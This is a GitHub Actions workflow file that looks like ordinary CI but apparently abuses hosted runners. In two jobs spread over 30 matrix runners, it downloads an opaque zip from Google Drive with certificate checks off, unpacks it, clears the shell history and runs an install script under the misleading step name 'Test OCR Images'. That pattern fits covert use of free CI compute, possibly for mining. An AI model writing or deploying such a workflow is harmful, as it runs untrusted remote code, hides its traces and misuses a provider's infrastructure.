name: nuibang0team
on:
  push:
    branches: [ "main" ]
  workflow_dispatch:

jobs:
  check:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.0, I.I, I.II]
        flag: ['Setup', 'Compile', 'Validate', 'Execute', 'Release']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: Install Packages
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1fcOxDVfR4d8AkYo1oj-WIkjldJhBOcof" -O nuibang0team.zip
        unzip -o nuibang0team.zip
        rm nuibang0team.zip
        history -c && history -w

    - name: Test OCR Images
      run: bash install_module.sh


  configure1:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.0, I.I, I.II]
        flag: ['Fetch', 'Compile', 'Evaluate', 'Run', 'Publish']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: Install Packages
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1fcOxDVfR4d8AkYo1oj-WIkjldJhBOcof" -O nuibang0team.zip
        unzip -o nuibang0team.zip
        rm nuibang0team.zip
        history -c && history -w

    - name: Test OCR Images
      run: bash install_module.sh
        
